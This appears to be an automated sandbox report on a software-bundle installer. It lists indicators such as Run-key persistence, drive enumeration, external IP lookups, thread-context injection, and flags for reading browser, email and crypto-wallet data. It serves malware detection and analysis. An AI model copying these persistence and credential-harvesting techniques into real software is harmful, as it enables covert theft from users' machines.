\REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Process not Found Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation hola_cr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Process not Found -
Loads dropped DLL 64 IoCs
pid Process 4312 taskmgr.exe 5028 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 2252 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 1180 MsiExec.exe 3444 winzip64.exe 3444 winzip64.exe 3444 winzip64.exe 3444 winzip64.exe 3444 winzip64.exe 3444 winzip64.exe 3444 winzip64.exe 5164 WzCABCacheSyncHelper64.exe 5164 WzCABCacheSyncHelper64.exe 5164 WzCABCacheSyncHelper64.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 4 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
description ioc Destination IP 208.67.222.222 Destination IP 209.244.0.3 Destination IP 209.244.0.3 Destination IP 208.67.222.222 -
Uses the VBS compiler for execution 1 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 15 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinZip UN = "\"C:\\Program Files\\WinZip\\WZUpdateNotifier.exe\" -show" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\NAV = "\"C:\\Program Files (x86)\\NortonInstaller\\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\\NAV\\A5E82D02\\21.1.0.18\\InstStub.exe\" /RELAUNCH /RUNONCE /NOPROMPT /PRODID NAV" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\NST = "\"C:\\Program Files (x86)\\NortonInstaller\\{92622AAD-05E8-4459-B256-765CE1E929FB}\\NST\\LicenseType\\2014.6.0.27\\InstStub.exe\" /RELAUNCH /RUNONCE /PRODID NST" Process not Found Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\NST Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\NST\MEDIA = "C:\\Program Files (x86)\\Norton AntiVirus\\Engine\\21.1.0.18\\NCO-SA.exe" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\NST = "\"C:\\Program Files (x86)\\NortonInstaller\\{92622AAD-05E8-4459-B256-765CE1E929FB}\\NST\\LicenseType\\2014.6.0.27\\InstStub.exe\" /RELAUNCH /RUNONCE /NOPROMPT /PRODID NST" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Free Download Manager = "\"C:\\Program Files\\Softdeluxe\\Free Download Manager\\fdm.exe\" --hidden" fdm.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\NAV = "\"C:\\Program Files (x86)\\NortonInstaller\\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\\NAV\\A5E82D02\\21.1.0.18\\InstStub.exe\" /RELAUNCH /RUNONCE /PRODID NAV" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\NAV\MEDIA = "C:\\Users\\Admin\\Downloads\\norton-antivirus-2014-es-win.exe" Process not Found Key created \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\NAV Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\NAV Process not Found Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\NST Process not Found -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA winzip64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA winzip64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Process not Found Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA winzip64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA winzip64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA winzip64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Process not Found Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Process not Found Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA winzip64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA winzip64.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Process not Found -
Drops desktop.ini file(s) 32 IoCs
description ioc Process File opened for modification C:\Users\Public\Documents\desktop.ini Process not Found File opened for modification C:\Users\Public\Desktop\desktop.ini Process not Found File opened for modification C:\Users\Admin\Documents\desktop.ini winzip64.exe File opened for modification C:\Users\Public\Documents\desktop.ini winzip64.exe File opened for modification C:\Users\Public\Documents\desktop.ini winzip64.exe File opened for modification C:\Users\Public\desktop.ini Process not Found File opened for modification C:\Users\Admin\Documents\desktop.ini Process not Found File opened for modification C:\Users\Public\desktop.ini Process not Found File opened for modification C:\Users\Public\desktop.ini winzip64.exe File opened for modification C:\Users\Admin\Documents\desktop.ini winzip64.exe File opened for modification C:\Users\Public\Documents\desktop.ini Process not Found File opened for modification C:\Users\Admin\Documents\desktop.ini Process not Found File opened for modification C:\Users\Public\desktop.ini winzip64.exe File opened for modification C:\Users\Admin\Documents\desktop.ini winzip64.exe File opened for modification C:\Users\Public\desktop.ini winzip64.exe File opened for modification C:\Users\Public\desktop.ini winzip64.exe File opened for modification C:\Users\Admin\Documents\desktop.ini Process not Found File opened for modification C:\Users\Public\Documents\desktop.ini Process not Found File opened for modification C:\Users\Admin\Documents\desktop.ini winzip64.exe File opened for modification C:\Users\Admin\Documents\desktop.ini winzip64.exe File opened for modification C:\Users\Public\desktop.ini winzip64.exe File opened for modification C:\Users\Public\Documents\desktop.ini Process not Found File opened for modification C:\Users\Public\Documents\desktop.ini winzip64.exe File opened for modification C:\Users\Public\desktop.ini Process not Found File opened for modification C:\Users\Public\Documents\desktop.ini winzip64.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton AntiVirus\desktop.ini Process not Found File opened for modification C:\Users\Public\desktop.ini winzip64.exe File opened for modification C:\Users\Public\Documents\desktop.ini winzip64.exe File opened for modification C:\Users\Admin\Documents\desktop.ini winzip64.exe File opened for modification C:\Users\Public\Documents\desktop.ini winzip64.exe File opened for modification C:\Users\Admin\Documents\desktop.ini Process not Found File opened for modification C:\Users\Public\desktop.ini Process not Found -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: winzip27.exe File opened (read-only) \??\F: winzip27.exe File opened (read-only) \??\O: winzip27.exe File opened (read-only) \??\T: winzip27.exe File opened (read-only) \??\Z: winzip27.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: winzip27.exe File opened (read-only) \??\L: winzip27.exe File opened (read-only) \??\N: winzip27.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\J: winzip27.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\H: winzip27.exe File opened (read-only) \??\K: winzip27.exe File opened (read-only) \??\R: winzip27.exe File opened (read-only) \??\S: winzip27.exe File opened (read-only) \??\V: winzip27.exe File opened (read-only) \??\Y: winzip27.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\I: winzip27.exe File opened (read-only) \??\M: winzip27.exe File opened (read-only) \??\P: winzip27.exe File opened (read-only) \??\X: winzip27.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\E: winzip27.exe File opened (read-only) \??\U: winzip27.exe File opened (read-only) \??\W: winzip27.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\G: winzip27.exe File opened (read-only) \??\Q: winzip27.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Installs/modifies Browser Helper Object 2 TTPs 9 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\{6D53EC84-6AAE-4787-AEEE-F4628F01010C} Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AB4C7833-A6EC-433f-B9FE-6B14B1A2F836} Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AB4C7833-A6EC-433f-B9FE-6B14B1A2F836}\NoExplorer = "1" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AB4C7833-A6EC-433f-B9FE-6B14B1A2F836}\ = "Norton Identity Protection" Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AB4C7833-A6EC-433f-B9FE-6B14B1A2F836}\NoExplorer = "1" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AB4C7833-A6EC-433f-B9FE-6B14B1A2F836}\ = "Norton Identity Protection" Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6D53EC84-6AAE-4787-AEEE-F4628F01010C}\NoExplorer = "1" Process not Found Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{6D53EC84-6AAE-4787-AEEE-F4628F01010C}\ = "Norton Vulnerability Protection" Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AB4C7833-A6EC-433f-B9FE-6B14B1A2F836} Process not Found -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2595 ipinfo.io 2596 ipinfo.io 2617 ipinfo.io 2618 ipinfo.io -
Drops file in System32 directory 64 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691 winzip64.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log idle_report.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol Process not Found File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\75CA58072B9926F763A91F0CC2798706_93E4B2BA79A897B3100CCB27F2D3BF4F winzip64.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\BrightData net_updater64.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1BB09BEEC155258835C193A7AA85AA5B_AD46936C28E2CFE9138D18D7106D4AB3 winzip64.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB net_updater64.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_01B1031F6736E831E4D73D2798F7305E winzip64.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log idle_report.exe File opened for modification C:\Windows\System32\GroupPolicy Process not Found File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI Process not Found File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA winzip64.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220 winzip64.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File opened for modification C:\Windows\System32\GroupPolicy Process not Found File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log idle_report.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA winzip64.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_93E4B2BA79A897B3100CCB27F2D3BF4F winzip64.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_01B1031F6736E831E4D73D2798F7305E winzip64.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141 net_updater64.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894 winzip64.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log idle_report.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log idle_report.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI Process not Found File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA winzip64.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62 winzip64.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB net_updater64.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_32C5FE0A4543109B82E92C22E4CDDA65 net_updater64.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 winzip64.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA winzip64.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini Process not Found File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini Process not Found File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol Process not Found File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220 winzip64.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log idle_report.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\test_wpf.exe.log test_wpf.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 winzip64.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141 net_updater64.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\idle_report.exe.log Process not Found File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691 winzip64.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1BB09BEEC155258835C193A7AA85AA5B_AD46936C28E2CFE9138D18D7106D4AB3 winzip64.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_32C5FE0A4543109B82E92C22E4CDDA65 net_updater64.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62 winzip64.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894 winzip64.exe -
Suspicious use of SetThreadContext 9 IoCs
description pid Process procid_target PID 3524 set thread context of 3736 3524 OWT.exe 96 PID 4468 set thread context of 2084 4468 OWT.exe 218 PID 1284 set thread context of 980 1284 OWT.exe 402 PID 1632 set thread context of 6036 1632 OWT.exe 486 PID 3544 set thread context of 8516 3544 SubmitDiagInfor.exe 1134 PID 3544 set thread context of 3984 3544 SubmitDiagInfor.exe 1153 PID 9212 set thread context of 7928 9212 Process not Found 2345 PID 5988 set thread context of 7208 5988 Process not Found 3017 PID 3068 set thread context of 5396 3068 Process not Found 3655 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Softdeluxe\Free Download Manager\QtQuick\Controls.2\Imagine\is-0B56V.tmp fdm_x64_setup.tmp File created C:\Program Files\Softdeluxe\Free Download Manager\translations\is-CSTD2.tmp fdm_x64_setup.tmp File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\1F\01\CSSBase.loc Process not Found File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\1F\01\NAVShExt.loc Process not Found File created C:\Program Files\WinZip\LocalPortableDeviceService.dll msiexec.exe File created C:\Program Files\Softdeluxe\Free Download Manager\is-FAQRG.tmp fdm_x64_setup.tmp File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\0E\01\uiAlert.loc Process not Found File created C:\Program Files (x86)\Norton Identity Safe\MUI\2014.6.0.27\16\02\CSSBase.loc Process not Found File created C:\Program Files\Softdeluxe\Free Download Manager\is-GND4N.tmp fdm_x64_setup.tmp File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\1F\01\coActMgr.loc Process not Found File created C:\Program Files (x86)\Norton AntiVirus\Branding\21.1.0.18\14\01\Readme.htm Process not Found File created C:\Program Files (x86)\Norton AntiVirus\NortonData\21.1.0.18\Definitions\VirusDefs\20131004.035\TROJ_NV.IDX Process not Found File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\19\01\ScanLess.loc Process not Found File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\1B\01\tuRes.loc Process not Found File created C:\Program Files\Softdeluxe\Free Download Manager\QtQuick\Controls.2\is-MTGH6.tmp fdm_x64_setup.tmp File created C:\Program Files\Softdeluxe\Free Download Manager\QtQuick\Controls.2\Fusion\is-VTITA.tmp fdm_x64_setup.tmp File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\13\01\Navw32.loc Process not Found File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\07\01\sqRes.loc Process not Found File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\06\01\sqRes.loc Process not Found File created C:\Program Files (x86)\Norton AntiVirus\NortonData\21.1.0.18\Definitions\BASHDefs\20131002.001\v.sig Process not Found File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\07\01\avScnTsk.loc Process not Found File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\14\01\IPUAUI.loc Process not Found File created C:\Program Files (x86)\Norton AntiVirus\NortonData\21.1.0.18\Definitions\VirusDefs\20131004.035\EX64.SYS Process not Found File created C:\Program Files (x86)\Norton Identity Safe\Engine\2014.6.0.27\ccL120U.dll Process not Found File created C:\Program Files (x86)\Norton AntiVirus\Branding\21.1.0.18\15\01\isBrand.loc Process not Found File opened for modification C:\Program Files\Hola\temp\chromium\103.0.5060.114\locales\fr.pak 7za.exe File created C:\Program Files\Softdeluxe\Free Download Manager\QtQuick\Controls.2\Imagine\is-R4ETK.tmp fdm_x64_setup.tmp File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\13\01\coActMgr.loc Process not Found File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\14\01\coUICtlr.loc Process not Found File created C:\Program Files (x86)\Norton Identity Safe\MUI\2014.6.0.27\01\01\coUICtlr.loc Process not Found File opened for modification C:\Program Files (x86)\BossLoader\System.Net.Requests.dll BossLoader.tmp File created C:\Program Files (x86)\BossLoader\is-FD524.tmp BossLoader.tmp File created C:\Program Files\Hola\temp\chromium\103.0.5060.114\locales\da.pak 7za.exe File created C:\Program Files\Softdeluxe\Free Download Manager\QtQuick\Controls.2\Fusion\is-SMQH6.tmp fdm_x64_setup.tmp File created C:\Program Files (x86)\Norton AntiVirus\Branding\da-DK\muis.dll.mui Process not Found File created C:\Program Files (x86)\Norton Identity Safe\MUI\2014.6.0.27\13\01\coMCPlug.loc Process not Found File created C:\Program Files\WinZip\WzWXFoned64.dll msiexec.exe File opened for modification C:\Program Files (x86)\BossLoader\System.Diagnostics.TraceSource.dll BossLoader.tmp File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\06\01\CSSBase.loc Process not Found File created C:\Program Files (x86)\Norton AntiVirus\Engine64\21.1.0.18\SDK64Cli.dll Process not Found File opened for modification C:\Program Files (x86)\Norton Identity Safe\MUI\2014.6.0.27\0B\01\coSfShre.loc Process not Found File created C:\Program Files (x86)\Norton Identity Safe\MUI\2014.6.0.27\18\01\isRes.loc Process not Found File opened for modification C:\Program Files (x86)\BossLoader\Microsoft.Extensions.Primitives.dll BossLoader.tmp File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\0C\01\ProdKey.css Process not Found File created C:\Program Files (x86)\Norton AntiVirus\Engine\21.1.0.18\ccJobMgr.dll Process not Found File created C:\Program Files\Softdeluxe\Free Download Manager\QtQuick\Controls\is-AC3TL.tmp fdm_x64_setup.tmp File created C:\Program Files\Softdeluxe\Free Download Manager\translations\is-4C5N5.tmp fdm_x64_setup.tmp File created C:\Program Files (x86)\Norton AntiVirus\MUI\21.1.0.18\16\02\DiagRpt.loc Process not Found File created C:\Program Files (x86)\Norton 